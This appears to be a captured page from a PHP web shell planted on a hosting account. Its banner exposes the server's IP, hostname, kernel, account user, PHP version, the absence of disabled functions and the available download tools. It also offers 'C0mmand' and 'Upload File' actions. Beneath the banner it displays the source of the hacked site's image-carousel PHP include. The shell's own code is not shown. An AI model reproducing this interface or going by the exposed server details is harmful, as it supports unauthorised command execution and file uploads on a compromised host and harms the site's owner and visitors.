Server IP : 103.53.40.154 / Your IP : 3.137.159.17 Web Server : Apache System : Linux md-in-35.webhostbox.net 4.19.286-203.ELK.el7.x86_64 #1 SMP Wed Jun 14 04:33:55 CDT 2023 x86_64 User : ppcad7no ( 715) PHP Version : 8.2.25 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0750) : /home2/ppcad7no/bsaec.in/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
<!-- Carousel Start --> <div class="container-fluid p-0 wow fadeIn" data-wow-delay="0.1s"> <div id="header-carousel" class="carousel slide" data-bs-ride="carousel"> <div class="carousel-inner"> <?php $sql7 = "SELECT * FROM `tb3_slider`"; $run7 = mysqli_query($db,$sql7) or die("Query Not run"); while($data7 = mysqli_fetch_assoc($run7)){ ?> <div class="carousel-item <?php echo ($data7['id'] == 1) ? 'active':'';?>"> <img class="w-100" src="img/<?php echo $data7['image_name']?>" alt="<?php echo $data7['image_name']?>"> <div class="carousel-caption"> <div class="container"> <div class="row justify-content-center"> <div class="col-lg-7"> <!--<h1 class="display-2 text-light mb-5 animated slideInDown">GET YOUR FUTURE HERE</h1>--> <a href="about.php" class="btn btn-primary py-sm-3 px-sm-5">Learn More</a> <a href="contact.php" class="btn btn-light py-sm-3 px-sm-5 ms-3">Enquiry Now</a> </div> </div> </div> </div> </div> <?php }?> <!--<div class="carousel-item">--> <!-- <img class="w-100" src="img/slider2.jpg" alt="Image">--> <!-- <div class="carousel-caption">--> <!-- <div class="container">--> <!-- <div class="row justify-content-center">--> <!-- <div class="col-lg-7">--> <!-- <h1 class="display-2 text-light mb-5 animated slideInDown">Your Future Is Our Top Priority</h1>--> <!-- <a href="about.php" class="btn btn-primary py-sm-3 px-sm-5">Learn More</a>--> <!-- <a href="contact.php" class="btn btn-light py-sm-3 px-sm-5 ms-3">Enquiry Now</a>--> <!-- </div>--> <!-- </div>--> <!-- </div>--> <!-- </div>--> <!--</div>--> </div> <button class="carousel-control-prev" type="button" data-bs-target="#header-carousel" data-bs-slide="prev"> <span class="carousel-control-prev-icon" aria-hidden="true"></span> <span class="visually-hidden">Previous</span> </button> <button class="carousel-control-next" type="button" data-bs-target="#header-carousel" data-bs-slide="next"> <span class="carousel-control-next-icon" aria-hidden="true"></span> <span class="visually-hidden">Next</span> </button> </div> </div> <!-- Carousel End -->